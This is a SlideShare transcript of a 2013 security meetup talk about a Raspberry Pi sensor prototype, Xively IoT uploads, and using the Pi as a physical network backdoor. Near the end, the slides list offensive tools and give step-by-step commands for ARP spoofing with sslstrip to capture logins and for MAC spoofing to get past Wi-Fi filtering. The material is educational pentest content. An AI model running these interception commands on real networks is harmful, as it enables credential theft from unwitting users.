• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
The LabRat - Physical backdoor hacks and IOT primer

The LabRat - Physical backdoor hacks and IOT primer



null Bangalore Chapter - July 2013 Meet

null Bangalore Chapter - July 2013 Meet



Total Views
Views on SlideShare
Embed Views



1 Embed 303

http://null.co.in 303



Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

    The LabRat - Physical backdoor hacks and IOT primer The LabRat - Physical backdoor hacks and IOT primer Presentation Transcript

    • The LabRat Physical Backdoor Hacks and Internet of Things (IOT) Primer Akshat Sharma, TME, Cisco Systems.
    • The Raspberry Pi http://www.raspberrypi.org/downloads Image Downloads and Updates http://elinux.org/RPi_Low-level_peripherals -- working with gpio http://elinux.org/RPiconfig interfacing with screens. Google’s your Best Friend
    • Raspberry Pi as a Physical Backdoor into your network http://securityaffairs.co/wordpress/15471/hacking/raspberry-pi-as-physical-backdoor.html It’s a device “you can just plug in and do a full-scale penetration test from start to finish,” Porcello says. “The enterprise can use stuff like this to do testing more often and more cheaply than they’re doing it right now.” -- CEO of Pwnie Express, Dave Porcello Rogue APs Mac Spoofing on wired Networks MITM attacks
    • Humidity Sensor CH0 CH3 CLK CS (AL) MOSI MISO IR LED - Receiver IR LED - Receiver Optical Fiber CH1 CH2 Binary Signal In Binary Signal In The LabRat Circuit Temperature Sensor Humidity Sensor Optical Fiber Tester
    • The LabRat- a Proof of Concept Prototype The Raspberry Pi – a 35$ Linux Computer that powers the LabRat prototype. To get more info on the Raspberry pi – visit http://www.raspberrypi.org/
    • The LabRat Prototype Current Setup 10 inch Capacitive Touchscreen Optical Fiber Tester Humidity Sensor Temperature Sensor Raspberry-Pi HDMi-to-LVDS converter board 10,000 mAH Lithium Polymer Battery
    • The LabRat Prototype LM 35 + ADS7841 Temperature Sensor LM 35 Temperature SensorADS7841 Analog to Digital Converter
    • The LabRat Prototype Humidity Sensor SMD + ADS7841 ADS7841 Analog to Digital Converter Humidity Sensor SMD
    • The LabRat Prototype Optical Fiber Tester Optical Fiber Holders Infra-red LED-Receiver Combination to transmit Messages via the Fiber
    • Connecting to an IOT Cloud ⁻ https://xively.com/ ⁻ Formerly Cosm, Pachube
    • Set up a Cosm (Now Xively) Account • Register on cosm (xively) and Add Device • You will Receive an API Key and FEED ID • Now use the old Cosm eeml library to set up Datastreams from the Raspberry Pi
    • Setting up the Python Script to send Data to Xively Install EEML package from github sudo apt-get install python-dev sudo apt-get install python-pip sudo easy_install -U distribute sudo pip install rpi.gpio >>>> work with Rpi GPIO pins wget -O geekman-python-eeml.tar.gz https://github.com/geekman/python- eeml/tarball/master tar zxvf geekman-python-eeml.tar.gz cd geekman-python-eeml* sudo python setup.py install Set up Python Script # source eeml package import eeml <snip> API_KEY = 'YOUR_API_KEY' FEED = YOUR_FEED_ID API_URL = '/v2/feeds/{feednum}.xml' .format(feednum = FEED)
    • The LabRat Prototype Online Real-Time Feed – Temperature and Humidity Visit the Real-Time Feed at https://cosm.com/feeds/89297
    • The LabRat Prototype Python Scripts 1) Python Script to upload the Temperature and Humidity Data to an online Cloud based feed that displays how the LabRat , in the Future, may do the same with Sensory Data at Customer Labs to provide Real-Time Analytics. 2) The same Python Script sends an email to lab-admins whenever the Temperature , humidity values exceed a pre-decided Threshold 3) Another Python Script to send messages (Binary Data) through an Optical Fiber using an Infrared LED-Receiver combination and email the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.
    • The LabRat Prototype Current List of Penetration-Testing Tools Information Gathering ------------------- wireshark tcpflow ngrep hostmap kismet btscanner sslscan sslstrip sslsniff ssldump tcptraceroute netmask tcpdump zenmap nmap arp-fingerprint dnswalk dnstracer Vulnerability Assessment ---------------------- airodump-ng sqlmap nikto svcrack Exploitation Tools ------------------ aircrack-ng airmon-ng airodump-ng aireplay-ng sqlninja exploit-db Privilege Escalation ----------------- wireshark ettercap tcpreplay tcpick packit packeth dsnniff Maintaining Access ---------------- ptunnel netcat ftp-proxt udp-tunnel proxychains dns2tcp
    • DEMO - Arp Spoofing using SSLstrip and arpspoof - Mac Spoofing using Airmon-ng and macchanger - Packet Sniffing using Wireshark - Other MITM attacks
    • Arp Spoofing and Mac-Spoofing Attacks Arp Spoofing • Set up Port Forwarding iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 echo '1' > /proc/sys/net/ipv4/ip_forward • Start Arp spoofing. Spoof the Gateway arpspoof -i wlan0 <gateway address> • Start sslstrip and log User Information (use –k option to logout users from their current sessions, forcing them to re-login) sslstrip -k -l 8080 Mac Spoofing on Wifi (How to bypass Mac Filtering) • ifconfig etho down • airmon-ng start wlan0 • iwlist wlan0 scanning • airodump-ng –c 6 -a --bssid <mac address of wireless access point> --- Gives info of connected devices • Ifconfig wlan0 down • Now use machchanger • Macchanger –m <mac of allowed devices> wlan0 • Ifconfig wlan0 up
    • Putting The Internet of Things into Perspective Co-incidental Cisco Plugin :p
    • Thank You